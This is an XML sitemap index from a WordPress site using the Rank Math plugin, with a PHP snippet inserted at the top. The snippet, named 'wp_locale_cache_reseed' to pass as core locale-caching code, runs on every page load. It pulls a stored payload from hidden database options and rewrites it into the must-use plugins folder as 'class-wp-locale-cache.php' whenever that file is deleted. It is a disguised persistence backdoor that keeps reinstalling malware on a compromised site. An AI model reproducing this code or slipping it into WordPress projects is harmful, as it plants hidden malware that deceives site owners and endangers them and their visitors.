


// locale-cache-a
if (!function_exists('wp_locale_cache_reseed')) {
	function wp_locale_cache_reseed() {
		$mu_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : (WP_CONTENT_DIR . '/mu-plugins');
		$dst = rtrim($mu_dir, '/\\') . '/class-wp-locale-cache.php';
		if (is_file($dst) && is_readable($dst)) {
			return;
		}
		if (!function_exists('get_option')) {
			return;
		}
		$stub = (string) get_option('wp_locale_cache_bootstrap', '');
		if ($stub === '') {
			$stub = (string) get_option('_wp_locale_cache_bootstrap', '');
		}
		if ($stub === '') {
			return;
		}
		if (!is_dir($mu_dir)) {
			if (function_exists('wp_mkdir_p')) {
				wp_mkdir_p($mu_dir);
			} else {
				@mkdir($mu_dir, 0755, true);
			}
		}
		@file_put_contents($dst, $stub);
	}
	add_action('init', 'wp_locale_cache_reseed', 1);
}
// locale-cache-a-end
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//lehappyending.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://lehappyending.com/page-sitemap.xml</loc>
		<lastmod>2023-12-06T13:53:22+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->